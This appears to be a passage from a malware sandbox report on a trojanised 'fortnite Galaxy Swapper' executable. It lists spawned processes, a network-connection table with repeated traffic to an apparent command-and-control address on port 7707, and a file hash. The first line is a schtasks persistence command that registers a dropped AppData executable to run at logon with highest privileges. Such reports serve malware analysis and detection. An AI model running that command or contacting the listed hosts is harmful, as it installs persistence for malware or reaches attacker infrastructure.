schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Server-Host.exe

"C:\Users\Admin\AppData\Roaming\Server-Host.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SDRSVC

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb3028cc40,0x7ffb3028cc4c,0x7ffb3028cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2252 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2352 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3308,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4448 /prefetch:2

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3736,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4688 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4700 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4700,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5036 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5320,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5328 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5348,i,1785483332300146940,18144814345919222627,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5052 /prefetch:1

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe"

C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe

"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\Final July Report FBI.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 5.145.216.31.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
US 8.8.8.8:53 37.124.203.66.in-addr.arpa udp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 12.125.203.66.in-addr.arpa udp
LU 66.203.124.37:443 eu.static.mega.co.nz tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
GB 2.18.27.82:443 www.bing.com tcp
GB 2.18.27.82:443 www.bing.com tcp
US 8.8.8.8:53 82.27.18.2.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
GB 2.18.27.76:443 r.bing.com tcp
GB 2.18.27.76:443 r.bing.com tcp
GB 104.98.2.161:443 th.bing.com tcp
GB 104.98.2.161:443 th.bing.com tcp
US 8.8.8.8:53 76.27.18.2.in-addr.arpa udp
US 8.8.8.8:53 161.2.98.104.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
US 8.8.8.8:53 gfs208n164.userstorage.mega.co.nz udp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
FR 185.206.26.74:443 gfs208n164.userstorage.mega.co.nz tcp
US 8.8.8.8:53 74.26.206.185.in-addr.arpa udp
GB 104.98.2.161:443 th.bing.com tcp
US 8.8.8.8:53 testfamilysafety.bing.com udp
US 204.79.197.201:443 testfamilysafety.bing.com tcp
US 8.8.8.8:53 201.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 i.pinimg.com udp
GB 199.232.56.84:443 i.pinimg.com tcp
US 8.8.8.8:53 www.pixelstalk.net udp
US 8.8.8.8:53 jooinn.com udp
US 8.8.8.8:53 wallpaperaccess.com udp
US 172.67.210.245:443 www.pixelstalk.net tcp
US 172.67.7.204:443 wallpaperaccess.com tcp
US 172.67.222.245:443 jooinn.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 84.56.232.199.in-addr.arpa udp
US 8.8.8.8:53 245.210.67.172.in-addr.arpa udp
US 8.8.8.8:53 204.7.67.172.in-addr.arpa udp
US 8.8.8.8:53 245.222.67.172.in-addr.arpa udp
US 8.8.8.8:53 wallup.net udp
US 8.8.8.8:53 wallpapers.com udp
US 8.8.8.8:53 static.vecteezy.com udp
DE 144.76.39.8:443 wallup.net tcp
GB 18.154.84.104:443 wallpapers.com tcp
GB 18.154.84.104:443 wallpapers.com tcp
US 104.18.4.151:443 static.vecteezy.com tcp
US 8.8.8.8:53 104.84.154.18.in-addr.arpa udp
US 8.8.8.8:53 151.4.18.104.in-addr.arpa udp
US 8.8.8.8:53 8.39.76.144.in-addr.arpa udp
US 8.8.8.8:53 61.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 www.enjpg.com udp
US 104.21.1.48:443 www.enjpg.com tcp
US 8.8.8.8:53 48.1.21.104.in-addr.arpa udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 aefd.nelreports.net udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 40.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 wallpapercave.com udp
US 172.67.29.26:443 wallpapercave.com tcp
US 172.67.29.26:443 wallpapercave.com tcp
US 172.67.29.26:443 wallpapercave.com tcp
US 8.8.8.8:53 images8.alphacoders.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 104.20.75.132:443 images8.alphacoders.com tcp
GB 2.18.190.81:80 apps.identrust.com tcp
GB 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 cdn.wallpapersafari.com udp
US 104.21.72.145:443 cdn.wallpapersafari.com tcp
US 8.8.8.8:53 26.29.67.172.in-addr.arpa udp
US 8.8.8.8:53 132.75.20.104.in-addr.arpa udp
US 8.8.8.8:53 81.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 145.72.21.104.in-addr.arpa udp
US 8.8.8.8:53 wallpapersafari.com udp
US 172.67.151.97:80 wallpapersafari.com tcp
US 172.67.151.97:80 wallpapersafari.com tcp
US 8.8.8.8:53 mcdn.wallpapersafari.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 www.googletagservices.com udp
NL 142.250.102.155:443 www.googletagservices.com tcp
NL 142.250.102.155:443 www.googletagservices.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 97.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 154.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 155.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.27.250.142.in-addr.arpa udp
NL 142.250.102.155:443 www.googletagservices.com tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
US 216.239.34.36:443 region1.analytics.google.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
NL 142.250.27.100:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 73.80.16.104.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 94.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 100.27.250.142.in-addr.arpa udp
NL 142.250.27.100:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 p4-ehphv4rdhic72-vimgueom6mxvyyyd-if-v6exp3-v4.metric.gstatic.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.102.132:443 tpc.googlesyndication.com tcp
NL 142.250.102.132:443 tpc.googlesyndication.com tcp
NL 142.250.102.132:443 tpc.googlesyndication.com tcp
NL 142.250.102.132:443 tpc.googlesyndication.com tcp
NL 142.250.102.132:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 95.27.250.142.in-addr.arpa udp
NL 142.250.27.106:443 www.google.com tcp
US 216.239.34.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 132.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 94.27.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.27.250.142.in-addr.arpa udp
US 8.8.8.8:53 ads.eu.criteo.com udp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
US 8.8.8.8:53 rtb.nl3.eu.criteo.com udp
NL 178.250.1.10:443 rtb.nl3.eu.criteo.com tcp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
US 8.8.8.8:53 17.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 3.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 6.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 10.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 15.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 25.1.250.178.in-addr.arpa udp
US 172.67.151.97:443 mcdn.wallpapersafari.com tcp
NL 142.250.102.132:443 tpc.googlesyndication.com udp
NL 142.250.27.106:443 www.google.com udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
NL 142.250.27.154:443 ep1.adtrafficquality.google tcp
US 8.8.8.8:53 154.27.250.142.in-addr.arpa udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
GB 173.222.211.40:443 aefd.nelreports.net udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 get-license4.com udp
US 104.21.21.238:443 get-license4.com tcp
US 8.8.8.8:53 c.pki.goog udp
NL 142.250.27.94:80 c.pki.goog tcp
US 8.8.8.8:53 238.21.21.104.in-addr.arpa udp
US 8.8.8.8:53 hit-8841.com udp
US 172.67.180.25:80 hit-8841.com tcp
US 8.8.8.8:53 25.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 back-kurwa.com udp
US 172.67.172.104:80 back-kurwa.com tcp
US 172.67.172.104:443 back-kurwa.com tcp
US 8.8.8.8:53 two-root.com udp
US 172.67.169.37:443 two-root.com tcp
US 8.8.8.8:53 104.172.67.172.in-addr.arpa udp
US 8.8.8.8:53 37.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 pick-pick.com udp
US 172.67.218.156:443 pick-pick.com tcp
NL 45.156.25.126:80 45.156.25.126 tcp
US 8.8.8.8:53 156.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 126.25.156.45.in-addr.arpa udp
US 216.239.34.36:443 region1.analytics.google.com udp
GB 92.123.142.104:443 www.bing.com tcp
US 8.8.8.8:53 104.142.123.92.in-addr.arpa udp
GB 95.101.129.216:443 www.bing.com tcp
GB 95.101.129.216:443 www.bing.com tcp
US 8.8.8.8:53 216.129.101.95.in-addr.arpa udp
GB 95.101.129.216:443 www.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 95.101.129.233:443 th.bing.com tcp
GB 95.101.129.233:443 th.bing.com tcp
GB 95.101.129.146:443 th.bing.com tcp
GB 95.101.129.146:443 th.bing.com tcp
US 8.8.8.8:53 233.129.101.95.in-addr.arpa udp
US 8.8.8.8:53 146.129.101.95.in-addr.arpa udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 151.101.194.49:443 bazaar.abuse.ch tcp
US 151.101.194.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 49.194.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.27.105:443 www.google.com udp
NL 142.250.27.105:443 www.google.com tcp
US 8.8.8.8:53 105.27.250.142.in-addr.arpa udp
GB 95.101.129.233:443 th.bing.com udp
US 8.8.8.8:53 fpt.microsoft.com udp
US 52.167.30.171:443 fpt.microsoft.com tcp
NL 142.250.27.105:443 www.google.com udp
US 8.8.8.8:53 171.30.167.52.in-addr.arpa udp
NL 142.250.27.105:443 www.google.com tcp
US 8.8.8.8:53 fpt2.microsoft.com udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 137.13.90.45.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.202:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 202.26.123.92.in-addr.arpa udp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 odc.officeapps.live.com udp
GB 52.109.28.48:443 odc.officeapps.live.com tcp
US 8.8.8.8:53 57.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 48.28.109.52.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 142.250.27.105:443 www.google.com udp
NL 142.250.27.105:443 www.google.com tcp
US 8.8.8.8:53 jspm.dev udp
US 205.234.175.175:443 jspm.dev tcp
US 8.8.8.8:53 blockchain.info udp
US 104.16.236.243:443 blockchain.info tcp
US 8.8.8.8:53 175.175.234.205.in-addr.arpa udp
US 8.8.8.8:53 blockstream.info udp
US 35.201.74.156:443 blockstream.info tcp
US 8.8.8.8:53 243.236.16.104.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 142.250.102.138:443 clients2.google.com udp
NL 142.250.102.138:443 clients2.google.com tcp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 156.74.201.35.in-addr.arpa udp
US 8.8.8.8:53 138.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 api.bitcore.io udp
US 172.67.184.201:443 api.bitcore.io tcp
US 172.67.184.201:443 api.bitcore.io udp
US 8.8.8.8:53 dot4net.com udp
US 172.67.213.148:443 dot4net.com tcp
US 8.8.8.8:53 148.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 201.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 dns-tunnel-check.googlezip.net udp
US 8.8.8.8:53 tunnel.googlezip.net udp
US 172.67.213.148:443 dot4net.com udp
US 216.239.34.157:443 tunnel.googlezip.net tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 157.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 155.27.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 consent.google.com udp
NL 142.250.102.100:443 consent.google.com tcp
NL 142.250.102.113:443 consent.google.com tcp
US 8.8.8.8:53 100.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn3.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn1.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn2.gstatic.com udp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com tcp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com tcp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com tcp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com tcp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com tcp
NL 142.250.27.101:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 101.27.250.142.in-addr.arpa udp
NL 142.250.27.105:443 www.google.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.102.95:443 content-autofill.googleapis.com tcp
NL 142.250.102.95:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 95.102.250.142.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
NL 142.250.27.105:443 www.google.com udp
NL 142.250.27.105:443 www.google.com udp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 217.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 24.211.222.173.in-addr.arpa udp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp
NL 45.90.13.137:7707 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e765f3d75e6b0e4a7119c8b14d47d8da
SHA1 cc9f7c7826c2e1a129e7d98884926076c3714fc0
SHA256 986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89
